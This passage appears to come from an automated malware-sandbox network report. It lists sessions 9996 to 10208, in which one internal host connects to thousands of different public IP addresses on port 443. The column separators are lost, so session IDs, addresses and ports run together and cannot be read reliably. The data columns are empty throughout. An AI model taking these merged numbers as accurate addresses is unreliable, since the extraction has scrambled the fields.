                                                        9996192.168.2.1447750154.227.82.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9997192.168.2.144450864.105.44.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9998192.168.2.14580669.122.191.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9999192.168.2.1444356155.96.41.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10000192.168.2.146019020.59.152.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10001192.168.2.144784086.81.157.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10002192.168.2.1439286178.255.4.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10003192.168.2.145890448.250.193.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10004192.168.2.1451366190.53.236.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10005192.168.2.1434540111.26.35.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10006192.168.2.1440558195.75.177.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10007192.168.2.1457968189.58.218.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10008192.168.2.145032814.16.155.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10009192.168.2.14357624.188.201.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10010192.168.2.1440260145.199.96.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10011192.168.2.1459208163.77.85.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10012192.168.2.1448872134.119.88.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10013192.168.2.1436272166.18.184.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10014192.168.2.1457202135.87.73.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10015192.168.2.1455768217.83.77.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10016192.168.2.145877672.213.237.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10017192.168.2.1455966175.66.200.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10018192.168.2.1442970162.172.6.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10019192.168.2.146015053.21.88.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10020192.168.2.1459176108.113.77.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10021192.168.2.1441978124.178.178.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10022192.168.2.1444038120.168.145.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10023192.168.2.144401253.4.253.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10024192.168.2.145805883.60.122.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10025192.168.2.144023462.92.50.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10026192.168.2.144772286.67.39.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10027192.168.2.145624043.150.250.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10028192.168.2.146055257.177.197.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10029192.168.2.1434368194.167.58.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10030192.168.2.144602841.126.158.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10031192.168.2.1449378161.199.246.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10032192.168.2.145896261.9.159.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10033192.168.2.1451598139.239.219.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10034192.168.2.1445286205.57.255.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10035192.168.2.1449528208.36.168.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10036192.168.2.143979490.247.68.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10037192.168.2.1451400128.176.60.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10038192.168.2.1443180133.81.153.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10039192.168.2.145649818.204.181.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10040192.168.2.1443162187.240.153.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10041192.168.2.143628014.187.203.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10042192.168.2.144414882.251.91.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10043192.168.2.1433026141.111.64.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10044192.168.2.145982696.77.118.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10045192.168.2.1440454129.169.142.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10046192.168.2.1456470122.29.142.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10047192.168.2.1441054213.137.37.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10048192.168.2.1441598204.214.47.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10049192.168.2.1437204197.22.124.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10050192.168.2.1438584183.62.122.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10051192.168.2.14590609.48.17.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10052192.168.2.1447376199.207.227.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10053192.168.2.1458256130.244.64.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10054192.168.2.1440546185.138.63.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10055192.168.2.143634659.172.241.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10056192.168.2.1450192176.125.144.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10057192.168.2.146084259.164.85.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10058192.168.2.1454084125.235.155.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10059192.168.2.1440090195.114.104.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10060192.168.2.1459720190.224.62.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10061192.168.2.145361879.74.158.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10062192.168.2.1449546131.11.152.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10063192.168.2.143344278.244.233.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10064192.168.2.1440882187.132.170.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10065192.168.2.1455400162.60.220.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10066192.168.2.144415675.169.231.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10067192.168.2.144821427.172.63.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10068192.168.2.143513276.33.168.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10069192.168.2.1439156190.87.123.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10070192.168.2.1450172147.187.172.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10071192.168.2.144449696.148.95.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10072192.168.2.1445634181.129.35.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10073192.168.2.145146848.143.207.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10074192.168.2.1441702102.194.146.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10075192.168.2.145817693.142.153.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10076192.168.2.1448308149.96.229.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10077192.168.2.1445030157.164.241.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10078192.168.2.1440314211.195.103.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10079192.168.2.1457764125.107.2.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10080192.168.2.1445764174.171.56.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10081192.168.2.144795246.202.181.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10082192.168.2.1454622133.117.198.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10083192.168.2.1447556148.204.194.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10084192.168.2.143333278.232.171.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10085192.168.2.143581868.178.216.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10086192.168.2.1452310195.127.54.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10087192.168.2.143576044.180.20.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10088192.168.2.1444062143.90.232.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10089192.168.2.145879886.70.162.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10090192.168.2.144411090.99.124.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10091192.168.2.1448782202.82.22.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10092192.168.2.1436186120.42.61.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10093192.168.2.1447356109.177.190.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10094192.168.2.146036048.6.24.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10095192.168.2.144635039.182.12.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10096192.168.2.1449934123.206.182.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10097192.168.2.14550065.169.220.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10098192.168.2.1437502105.218.60.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10099192.168.2.1446742181.100.179.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10100192.168.2.1448034114.174.139.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10101192.168.2.1459384120.106.14.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10102192.168.2.1443050104.4.105.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10103192.168.2.144561286.255.117.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10104192.168.2.1436746194.67.229.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10105192.168.2.145377082.140.165.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10106192.168.2.1432892117.102.62.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10107192.168.2.145802299.237.132.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10108192.168.2.1433284156.63.206.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10109192.168.2.1457848180.232.231.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10110192.168.2.14360868.160.240.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10111192.168.2.1433018153.66.50.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10112192.168.2.1459252140.23.184.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10113192.168.2.146072213.254.145.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10114192.168.2.1455338192.201.175.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10115192.168.2.144036635.9.202.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10116192.168.2.1455608106.83.26.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10117192.168.2.144878865.194.155.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10118192.168.2.1440032121.170.197.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10119192.168.2.143571447.189.121.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10120192.168.2.1449044135.130.187.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10121192.168.2.145029252.60.43.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10122192.168.2.1450244206.235.103.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10123192.168.2.144445488.157.217.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10124192.168.2.1444368198.86.227.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10125192.168.2.145428444.191.106.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10126192.168.2.143534857.6.25.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10127192.168.2.1446322156.125.228.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10128192.168.2.1446608205.52.199.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10129192.168.2.145479263.92.227.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10130192.168.2.145595690.226.67.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10131192.168.2.1437336115.160.249.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10132192.168.2.1438990156.25.213.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10133192.168.2.1458934185.123.152.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10134192.168.2.145230813.210.20.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10135192.168.2.1439812103.47.216.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10136192.168.2.144923690.95.43.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10137192.168.2.1455478150.132.156.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10138192.168.2.1449886179.74.176.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10139192.168.2.1438770154.238.104.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10140192.168.2.144760024.122.89.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10141192.168.2.145109252.130.84.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10142192.168.2.144326635.98.198.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10143192.168.2.1457722201.131.74.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10144192.168.2.1452456137.91.141.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10145192.168.2.1452748103.157.40.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10146192.168.2.1458336194.44.92.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10147192.168.2.1434502176.239.253.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10148192.168.2.143420267.211.41.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10149192.168.2.1447802185.134.49.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10150192.168.2.143866850.36.206.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10151192.168.2.1446236143.172.144.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10152192.168.2.1450624182.39.181.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10153192.168.2.143952043.213.107.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10154192.168.2.145003234.240.146.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10155192.168.2.145598892.109.173.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10156192.168.2.144470817.100.0.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10157192.168.2.1440240150.233.226.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10158192.168.2.1452498166.128.225.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10159192.168.2.144216645.177.78.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10160192.168.2.144433481.186.123.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10161192.168.2.1434252149.237.42.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10162192.168.2.1436754153.28.165.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10163192.168.2.144517883.111.22.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10164192.168.2.1457206189.114.254.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10165192.168.2.1446962209.187.123.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10166192.168.2.1453048184.217.67.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10167192.168.2.144480419.40.62.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10168192.168.2.144486893.23.112.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10169192.168.2.1454484178.90.98.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10170192.168.2.1436614113.70.187.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10171192.168.2.144409482.146.46.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10172192.168.2.144872645.134.128.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10173192.168.2.1456654146.53.5.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10174192.168.2.1439166110.21.172.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10175192.168.2.144048034.153.140.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10176192.168.2.143330214.88.228.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10177192.168.2.1448722150.229.72.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10178192.168.2.144884086.238.180.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10179192.168.2.144038076.154.214.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10180192.168.2.1445688108.194.211.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10181192.168.2.1443324101.112.125.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10182192.168.2.1457956124.206.232.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10183192.168.2.143547439.52.147.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10184192.168.2.1452064177.4.142.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10185192.168.2.145513427.229.208.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10186192.168.2.1458596191.228.44.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10187192.168.2.1438674188.252.50.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10188192.168.2.1450084119.40.213.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10189192.168.2.14476445.156.225.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10190192.168.2.145380893.43.108.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10191192.168.2.145457223.204.3.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10192192.168.2.143747259.110.248.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10193192.168.2.1448720122.166.44.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10194192.168.2.1450782121.131.171.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10195192.168.2.1436650190.247.212.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10196192.168.2.145684870.65.111.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10197192.168.2.145874276.254.68.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10198192.168.2.144344096.216.150.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10199192.168.2.144487865.119.53.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10200192.168.2.143407490.3.65.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10201192.168.2.1445240164.241.134.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10202192.168.2.14491544.142.90.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10203192.168.2.1453116201.181.255.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10204192.168.2.1439654133.220.56.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10205192.168.2.1445740103.94.13.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10206192.168.2.144166466.160.221.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10207192.168.2.143481035.15.73.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10208192.168.2.1459840204.171.158.249443
